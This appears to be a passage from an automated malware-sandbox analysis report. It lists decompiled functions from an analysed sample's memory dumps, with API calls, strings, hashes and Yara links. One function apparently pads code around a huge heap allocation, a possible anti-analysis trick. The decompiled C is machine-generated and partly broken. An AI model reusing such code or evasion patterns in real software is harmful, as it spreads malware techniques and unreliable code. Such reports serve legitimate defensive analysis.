							E00D880E0( &_v64, "Hundred ");
							E00D81DF0(_v40, _v40,  &_v92);
							E00D880E0( &_v64,  &_v92);
							E00D81DE0( &_v32, _v44,  &_v32);
							E00D880E0( &_v64,  &_v32);
							_t294 = _t294 + 0x18;
						}
					} else {
						E00D81DE0( &_v32, _v12,  &_v32);
					}
				} else {
					E00D81DE0(_v20, _v20,  &_v32);
					E00D880E0( &_v64, "Hundred ");
					E00D81DE0(_v12, _v12,  &_v32);
					E00D880E0( &_v64,  &_v32);
					_t294 = _t294 + 0x10;
				}
				_v8 = 4;
				while(_v8 >= 0) {
					if( *(_t292 + _v8 * 4 - 0x70) >= 0x14) {
						asm("cdq");
						E00D81DF0( *(_t292 + _v8 * 4 - 0x70) / 0xa,  *(_t292 + _v8 * 4 - 0x70) / 0xa,  &_v92);
						asm("cdq");
						E00D81DE0( *(_t292 + _v8 * 4 - 0x70) / 0xa,  *(_t292 + _v8 * 4 - 0x70) % 0xa,  &_v32);
						E00D880E0(_t292 + _v8 * 0x1e - 0x13c,  &_v32);
						_t294 = _t294 + 8;
					} else {
						E00D81DE0( &_v32,  *(_t292 + _v8 * 4 - 0x70),  &_v32);
					}
					_v8 = _v8 - 1;
				}
				_v8 = 0;
				while(_v8 < 5) {
					_t189 = E00D88260(_t292 + _v8 * 0x1e - 0x13c);
					_t294 = _t294 + 4;
					_v68 = _t189;
					if(_v68 != 0) {
						E00D880E0( &_v168, _t292 + _v8 * 0x1e - 0x13c);
						E00D880E0( &_v168,  &_v80);
						_t294 = _t294 + 0x10;
					}
					_v8 = _v8 + 1;
				}
				E00D880E0(_a12,  &_v64);
				_t186 = E00D88260(_a12);
				 *((char*)(_a12 + _t186 - 1)) = 0;
				return _t186;
			}


































                                              0x00d81ad9
                                              0x00d81adf
                                              0x00d81ae2
                                              0x00d81ae5
                                              0x00d81ae8
                                              0x00d81aeb
                                              0x00d81aef
                                              0x00d81af2
                                              0x00d81af8
                                              0x00d81afb
                                              0x00d81afe
                                              0x00d81b01
                                              0x00d81b13
                                              0x00d81b18
                                              0x00d81b1b
                                              0x00d81b20
                                              0x00d81b26
                                              0x00d81b36
                                              0x00d81b3d
                                              0x00d81b45
                                              0x00d81b48
                                              0x00d81b5a
                                              0x00d81b63
                                              0x00d81b6e
                                              0x00d81b75
                                              0x00d81b7d
                                              0x00d81b57
                                              0x00d81b57
                                              0x00d81b8e
                                              0x00d81b94
                                              0x00d81b9c
                                              0x00d81ba2
                                              0x00d81baa
                                              0x00d81bb0
                                              0x00d81bb8
                                              0x00d81bbb
                                              0x00d81bbe
                                              0x00d81bc4
                                              0x00d81bc6
                                              0x00d81bcd
                                              0x00d81c19
                                              0x00d81c37
                                              0x00d81ca1
                                              0x00d81cae
                                              0x00d81cbb
                                              0x00d81cc0
                                              0x00d81c3f
                                              0x00d81c47
                                              0x00d81c55
                                              0x00d81c65
                                              0x00d81c72
                                              0x00d81c82
                                              0x00d81c8f
                                              0x00d81c94
                                              0x00d81c94
                                              0x00d81c21
                                              0x00d81c29
                                              0x00d81c29
                                              0x00d81bd5
                                              0x00d81bdd
                                              0x00d81beb
                                              0x00d81bfb
                                              0x00d81c08
                                              0x00d81c0d
                                              0x00d81c0d
                                              0x00d81cc3
                                              0x00d81cd5
                                              0x00d81ce3
                                              0x00d81d03
                                              0x00d81d0c
                                              0x00d81d1c
                                              0x00d81d25
                                              0x00d81d3c
                                              0x00d81d41
                                              0x00d81ce5
                                              0x00d81cf1
                                              0x00d81cf1
                                              0x00d81cd2
                                              0x00d81cd2
                                              0x00d81d46
                                              0x00d81d58
                                              0x00d81d6c
                                              0x00d81d71
                                              0x00d81d74
                                              0x00d81d7b
                                              0x00d81d92
                                              0x00d81da5
                                              0x00d81daa
                                              0x00d81daa
                                              0x00d81d55
                                              0x00d81d55
                                              0x00d81db7
                                              0x00d81dc3
                                              0x00d81dce
                                              0x00d81dd6

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _memset
                                              • String ID: Hundred $Hundred
                                              • API String ID: 2102423945-1478457770
                                              • Opcode ID: 19b49bf9d6a28b196e3dd09fe2be9a36b14ea9c12568d27166eabaad2db7316e
                                              • Instruction ID: 316bfbcc7722034d755ec0597154f5a62bab22e0c5e2c2a237cf4eb7f3e8decd
                                              • Opcode Fuzzy Hash: 19b49bf9d6a28b196e3dd09fe2be9a36b14ea9c12568d27166eabaad2db7316e
                                              • Instruction Fuzzy Hash: B1A13FB5D00208EBCB04EFE8D881BDDB7B9FF88300F508569E115A7251EB759A49DB71
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D8F6BC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 78%
                                              			E00D8F6BC(void* __ebx, void* __edx, void* __esi, void* __eflags) {
				intOrPtr* _v20;
				void* _t4;
				intOrPtr* _t7;
				intOrPtr _t9;

				_t15 = __edx;
				_t13 = __ebx;
				_t4 = E00D93BBF(0, 0x10000, 0x30000);
				if(_t4 != 0) {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00D88B27(__ebx, __edx);
					asm("int3");
					_t7 =  *_v20;
					__eflags =  *_t7 - 0xe06d7363;
					if( *_t7 != 0xe06d7363) {
						L9:
						__eflags = 0;
						return 0;
					} else {
						__eflags =  *((intOrPtr*)(_t7 + 0x10)) - 3;
						if( *((intOrPtr*)(_t7 + 0x10)) != 3) {
							goto L9;
						} else {
							_t9 =  *((intOrPtr*)(_t7 + 0x14));
							__eflags = _t9 - 0x19930520;
							if(__eflags == 0) {
								L10:
								E00D8C649(_t13, _t15, 0, __eflags);
								asm("int3");
								E00D8C020(E00D8F6E3);
								__eflags = 0;
								return 0;
							} else {
								__eflags = _t9 - 0x19930521;
								if(__eflags == 0) {
									goto L10;
								} else {
									__eflags = _t9 - 0x19930522;
									if(__eflags == 0) {
										goto L10;
									} else {
										__eflags = _t9 - 0x1994000;
										if(__eflags == 0) {
											goto L10;
										} else {
											goto L9;
										}
									}
								}
							}
						}
					}
				} else {
					return _t4;
				}
			}







                                              0x00d8f6bc
                                              0x00d8f6bc
                                              0x00d8f6ca
                                              0x00d8f6d4
                                              0x00d8f6d8
                                              0x00d8f6d9
                                              0x00d8f6da
                                              0x00d8f6db
                                              0x00d8f6dc
                                              0x00d8f6dd
                                              0x00d8f6e2
                                              0x00d8f6e9
                                              0x00d8f6eb
                                              0x00d8f6f1
                                              0x00d8f718
                                              0x00d8f718
                                              0x00d8f71b
                                              0x00d8f6f3
                                              0x00d8f6f3
                                              0x00d8f6f7
                                              0x00000000
                                              0x00d8f6f9
                                              0x00d8f6f9
                                              0x00d8f6fc
                                              0x00d8f701
                                              0x00d8f71e
                                              0x00d8f71e
                                              0x00d8f723
                                              0x00d8f729
                                              0x00d8f72f
                                              0x00d8f731
                                              0x00d8f703
                                              0x00d8f703
                                              0x00d8f708
                                              0x00000000
                                              0x00d8f70a
                                              0x00d8f70a
                                              0x00d8f70f
                                              0x00000000
                                              0x00d8f711
                                              0x00d8f711
                                              0x00d8f716
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d8f716
                                              0x00d8f70f
                                              0x00d8f708
                                              0x00d8f701
                                              0x00d8f6f7
                                              0x00d8f6d6
                                              0x00d8f6d7
                                              0x00d8f6d7

                                              APIs
                                              • __controlfp_s.LIBCMT ref: 00D8F6CA
                                                • Part of subcall function 00D93BBF: __control87.LIBCMT ref: 00D93BE3
                                              • __invoke_watson.LIBCMT ref: 00D8F6DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: __control87__controlfp_s__invoke_watson
                                              • String ID: csm
                                              • API String ID: 1371525046-1018135373
                                              • Opcode ID: d30a352ece180195bb089bf9072f338ca7b6f7ac9cea54e44997cf9d291e4f6e
                                              • Instruction ID: a56e73f7f2fe3cfaecba42c6b07c2749e300ffe5183e70a9720b0d0e999a6409
                                              • Opcode Fuzzy Hash: d30a352ece180195bb089bf9072f338ca7b6f7ac9cea54e44997cf9d291e4f6e
                                              • Instruction Fuzzy Hash: C5F090211003055B9A29BB297C4AB9A779D9F10311BA80462F4088A921EB50EEC5C3BA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0158FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 53%
                                              			E0158FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0153CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01585720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01585720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                              0x0158fdda
                                              0x0158fde2
                                              0x0158fde5
                                              0x0158fdec
                                              0x0158fdfa
                                              0x0158fdff
                                              0x0158fe0a
                                              0x0158fe0f
                                              0x0158fe17
                                              0x0158fe1e
                                              0x0158fe19
                                              0x0158fe19
                                              0x0158fe19
                                              0x0158fe20
                                              0x0158fe21
                                              0x0158fe22
                                              0x0158fe25
                                              0x0158fe40

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0158FDFA
                                              Strings
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0158FE2B
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0158FE01
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.383976057.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: true
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                              • API String ID: 885266447-3903918235
                                              • Opcode ID: 721a7149cebc39dc5b25736471b1216d00fe08e1a1b407d9d7536cac5d708296
                                              • Instruction ID: 00dcd313d0df10383154712293cae19e262c664b1379226b52927602270baa10
                                              • Opcode Fuzzy Hash: 721a7149cebc39dc5b25736471b1216d00fe08e1a1b407d9d7536cac5d708296
                                              • Instruction Fuzzy Hash: 49F0FC321001027FD6202A45DC06F237F5AFB84771F244316F6246A1E1EAA2F87096F0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D86B20, Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 41%
                                              			E00D86B20(void* __ecx) {
				void* _v8;
				void* _t5;
				void* _t7;
				void* _t14;

				_t14 = __ecx;
				_push(__ecx);
				_t5 = HeapAlloc(GetProcessHeap(), 1, 0x17d78400);
				_v8 = _t5;
				_push(_t5);
				if(_t5 != 0x11) {
					asm("cld");
				}
				asm("clc");
				_pop(_t7);
				if(_v8 != 0) {
					E00D86BF0(_t14, _v8, 0x17d78400);
					_push(_t11);
					asm("cld");
					_t7 = HeapAlloc(GetProcessHeap(), 1, 0);
				}
				return _t7;
			}







                                              0x00d86b20
                                              0x00d86b23
                                              0x00d86b33
                                              0x00d86b39
                                              0x00d86b3c
                                              0x00d86b40
                                              0x00d86b44
                                              0x00d86b45
                                              0x00d86b49
                                              0x00d86b4a
                                              0x00d86b4f
                                              0x00d86b5d
                                              0x00d86b62
                                              0x00d86b67
                                              0x00d86b74
                                              0x00d86b74
                                              0x00d86b7e

                                              APIs
                                              • GetProcessHeap.KERNEL32(00000001,17D78400,00000000,?,?,00D81020,?,00D88942,00D80000,00000000,00000000), ref: 00D86B2C
                                              • HeapAlloc.KERNEL32(00000000,?,?,00D81020,?,00D88942,00D80000,00000000,00000000), ref: 00D86B33
                                              • GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,00D81020,?,00D88942,00D80000,00000000,00000000), ref: 00D86B6D
                                              • HeapAlloc.KERNEL32(00000000,?,?,00D81020,?,00D88942,00D80000,00000000,00000000), ref: 00D86B74
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Heap$AllocProcess
                                              • String ID:
                                              • API String ID: 1617791916-0
                                              • Opcode ID: 511e712a529a354b883824cb823d51adc686660b2830cfab2cc461baeb67d8f9
                                              • Instruction ID: 249cb68a48d339baeceb0e3307d804957b3a36bc8dda424e3d6fc72151e4afd6
                                              • Opcode Fuzzy Hash: 511e712a529a354b883824cb823d51adc686660b2830cfab2cc461baeb67d8f9
                                              • Instruction Fuzzy Hash: 0BF05EB1941218BFEB0067B4AC5EFAFB7ACE706B19F600555F609D3260C97299089770
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Analysis Process: cmd.exe PID: 6476 Parent PID: 3440 cmd.exeCOMMON

                                              Executed Functions

                                              Function 02FD9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.678247659.0000000002F70000.00000040.00000001.sdmp, Offset: 02F70000, based on PE: true
                                              • Associated: 00000004.00000002.678842186.000000000308B000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: a89b5c714e606dddd160c3a50a930509e16544ab7b089543e39c70db18c165e5
                                              • Instruction ID: 42b01d2e3699b529de74f775cb97cc9ab34ee165938a94b75b805e343b2ec00b
                                              • Opcode Fuzzy Hash: a89b5c714e606dddd160c3a50a930509e16544ab7b089543e39c70db18c165e5
                                              • Instruction Fuzzy Hash: FE90026121180042D601656D4C14B17000997D03C3F51C115A5155594CC95588616561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02FD9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.678247659.0000000002F70000.00000040.00000001.sdmp, Offset: 02F70000, based on PE: true
                                              • Associated: 00000004.00000002.678842186.000000000308B000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 5824931ba7871186b9525475cef6654d031c692030dbf8b7b90e7cc649e90c5a
                                              • Instruction ID: ed440915f3175ca273b349b3b62ec90e3065717f1980953688620c6baa1997ce
                                              • Opcode Fuzzy Hash: 5824931ba7871186b9525475cef6654d031c692030dbf8b7b90e7cc649e90c5a
                                              • Instruction Fuzzy Hash: D590027120100413D512615D4904717000D97D02C1F91C412A5425598D96968952B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02FD9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.678247659.0000000002F70000.00000040.00000001.sdmp, Offset: 02F70000, based on PE: true
                                              • Associated: 00000004.00000002.678842186.000000000308B000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 9b5b89174921b994cb96bd40436799166337952c946653d63ac2e5569a33d3eb
                                              • Instruction ID: b203cbc390858d255356de6b01e6f445a6e9c97cd06c28882d0719e80a62a7ca
                                              • Opcode Fuzzy Hash: 9b5b89174921b994cb96bd40436799166337952c946653d63ac2e5569a33d3eb
                                              • Instruction Fuzzy Hash: AF900261242041525946B15D4804517400AA7E02C1791C012A6415990C85669856E661
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02FD99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.678247659.0000000002F70000.00000040.00000001.sdmp, Offset: 02F70000, based on PE: true
                                              • Associated: 00000004.00000002.678842186.000000000308B000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: a6aa3de69f25e8c2378d3311244d2154f65b1ff4fb1c27a90d833523992637df
                                              • Instruction ID: e388869b8c6fc4cfb7c05038a7d9c2b0677871b67edda2090d7b01ded843fd25
                                              • Opcode Fuzzy Hash: a6aa3de69f25e8c2378d3311244d2154f65b1ff4fb1c27a90d833523992637df
                                              • Instruction Fuzzy Hash: EC9002A134100442D501615D4814B170009D7E13C1F51C015E6065594D8659CC527166
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02FD9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.678247659.0000000002F70000.00000040.00000001.sdmp, Offset: 02F70000, based on PE: true
                                              • Associated: 00000004.00000002.678842186.000000000308B000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 173fd42148bc3d9749762250188fdf7a05d3ddf9f84c62d2e0656a772adef49a
                                              • Instruction ID: 1dea029ad3e3153a60bdeeaa235f0c1492ff8d531c580deeb370c50f46945d72
                                              • Opcode Fuzzy Hash: 173fd42148bc3d9749762250188fdf7a05d3ddf9f84c62d2e0656a772adef49a
                                              • Instruction Fuzzy Hash: 999002B120100402D541715D4804757000997D03C1F51C011AA065594E86998DD576A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02FD96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.678247659.0000000002F70000.00000040.00000001.sdmp, Offset: 02F70000, based on PE: true
                                              • Associated: 00000004.00000002.678842186.000000000308B000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 12e8ced241c6fac95518cec7cdb1d6a5ffbe5dcb9beec576dfc50694880e5798
                                              • Instruction ID: c980556d4b2babc8bf528dbb1547cc7878823fbd981b64bc3c05bb2ec077594c
                                              • Opcode Fuzzy Hash: 12e8ced241c6fac95518cec7cdb1d6a5ffbe5dcb9beec576dfc50694880e5798
                                              • Instruction Fuzzy Hash: B490027120108802D511615D880475B000997D03C1F55C411A9425698D86D588917161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02FD96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.678247659.0000000002F70000.00000040.00000001.sdmp, Offset: 02F70000, based on PE: true
                                              • Associated: 00000004.00000002.678842186.000000000308B000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c04228698ba029b44580ab6416ba651163128c3ef5097eb8019a119d5a9a02ae
                                              • Instruction ID: 1b7a1496d0dc2ea3d1dc2ff52df6e249f942f231fb0338c7e757f46790a4681b
                                              • Opcode Fuzzy Hash: c04228698ba029b44580ab6416ba651163128c3ef5097eb8019a119d5a9a02ae
                                              • Instruction Fuzzy Hash: 6290027120100842D501615D4804B57000997E03C1F51C016A5125694D8655C8517561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02FD9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.678247659.0000000002F70000.00000040.00000001.sdmp, Offset: 02F70000, based on PE: true
                                              • Associated: 00000004.00000002.678842186.000000000308B000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 14596152195d3866921d84712aa47cd3c3be0e740b2e06b628a8e331d0d0e2fc
                                              • Instruction ID: 7a639ddb5ccf600d446dd76ac3d5abcba3dfdabf3a1efa2ce3166f063888cc00
                                              • Opcode Fuzzy Hash: 14596152195d3866921d84712aa47cd3c3be0e740b2e06b628a8e331d0d0e2fc
                                              • Instruction Fuzzy Hash: 0190027131114402D511615D8804717000997D12C1F51C411A5825598D86D588917162
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02FD9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.678247659.0000000002F70000.00000040.00000001.sdmp, Offset: 02F70000, based on PE: true
                                              • Associated: 00000004.00000002.678842186.000000000308B000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: dfde103f578ee08eaa0cb5a3e0599244766fca34e6d824c7cdea225f591f6ecb
                                              • Instruction ID: 5b47cbad61a720d99f96ed26cd593b536ddbe8720df8ab55c52d9d3369693fcb
                                              • Opcode Fuzzy Hash: dfde103f578ee08eaa0cb5a3e0599244766fca34e6d824c7cdea225f591f6ecb
                                              • Instruction Fuzzy Hash: AA90026921300002D581715D580861B000997D12C2F91D415A5016598CC95588696361
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02FD9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.678247659.0000000002F70000.00000040.00000001.sdmp, Offset: 02F70000, based on PE: true
                                              • Associated: 00000004.00000002.678842186.000000000308B000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: e6502e04802a0e2f5f7ecb385e1c0f511ce6ce030e6ac4a0544e40ee4bfcca8c
                                              • Instruction ID: 627d8e18953f8b24dca09e867aaf0e262539ec7a6d006c6369fb26902750c8aa
                                              • Opcode Fuzzy Hash: e6502e04802a0e2f5f7ecb385e1c0f511ce6ce030e6ac4a0544e40ee4bfcca8c
                                              • Instruction Fuzzy Hash: 1A90027120100402D501659D5808657000997E03C1F51D011AA025595EC6A588917171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02FD95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.678247659.0000000002F70000.00000040.00000001.sdmp, Offset: 02F70000, based on PE: true
                                              • Associated: 00000004.00000002.678842186.000000000308B000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 2574e0b628f36be6c07531d36d3919643751df9d1c8fa7f62fe7a844db7bdb23
                                              • Instruction ID: f669bb8687d435c22d5bb6562ea1f9320ca727822f627d54301915a93a30942a
                                              • Opcode Fuzzy Hash: 2574e0b628f36be6c07531d36d3919643751df9d1c8fa7f62fe7a844db7bdb23
                                              • Instruction Fuzzy Hash: 669002A1202000034506715D4814627400E97E02C1B51C021E60155D0DC56588917165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02FD9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.678247659.0000000002F70000.00000040.00000001.sdmp, Offset: 02F70000, based on PE: true
                                              • Associated: 00000004.00000002.678842186.000000000308B000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: e2f61248487c7b601adaa103ddc22798aeb067338bdd5517a230edb246508e8c
                                              • Instruction ID: 7da0ffd53f454bf51be906fb3b031677ab78ba220c8625125b3eef457d32dc96
                                              • Opcode Fuzzy Hash: e2f61248487c7b601adaa103ddc22798aeb067338bdd5517a230edb246508e8c
                                              • Instruction Fuzzy Hash: E2900265211000030506A55D0B04517004A97D53D1351C021F6016590CD66188616161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02FD967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.678247659.0000000002F70000.00000040.00000001.sdmp, Offset: 02F70000, based on PE: true
                                              • Associated: 00000004.00000002.678842186.000000000308B000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: e9519f3fbd834bc128f82e628511abb91493e64f315f62fa1c27f76d6d4b47be
                                              • Instruction ID: 99afd715ac300edf00c22353c63c265757da4aa14ba3c2923e15a7f756eb92b7
                                              • Opcode Fuzzy Hash: e9519f3fbd834bc128f82e628511abb91493e64f315f62fa1c27f76d6d4b47be
                                              • Instruction Fuzzy Hash: DCB09B71D014C5C5DA11D7B44A08727790577D07C1F16C051D3030685A4778C491F6B5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 002C3506, Relevance: 65.1, APIs: 30, Strings: 7, Instructions: 353memoryCOMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 48%
                                              			E002C3506(void __ecx, signed int __edx, long _a4, DWORD* _a8) {
				signed int _v8;
				signed int _v16;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				unsigned int _v36;
				intOrPtr _v40;
				unsigned int _v44;
				intOrPtr _v50;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v56;
				signed int _v68;
				void* _v76;
				void* _v80;
				DWORD* _v84;
				long _v88;
				void* _v90;
				signed int _v92;
				int _v96;
				void* _v100;
				long _v108;
				signed int _v112;
				void* _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t83;
				void* _t85;
				int _t86;
				int _t87;
				int _t93;
				signed int _t95;
				void* _t99;
				void* _t104;
				void* _t105;
				void _t106;
				void _t107;
				signed int _t108;
				void* _t118;
				void _t119;
				signed int _t133;
				signed int _t134;
				void* _t141;
				void* _t142;
				long _t143;
				void* _t147;
				signed char _t149;
				signed int _t152;
				void* _t156;
				signed int _t157;
				void* _t159;
				void* _t163;
				void* _t168;
				void* _t169;
				int _t170;
				void* _t177;
				void* _t178;
				void* _t181;
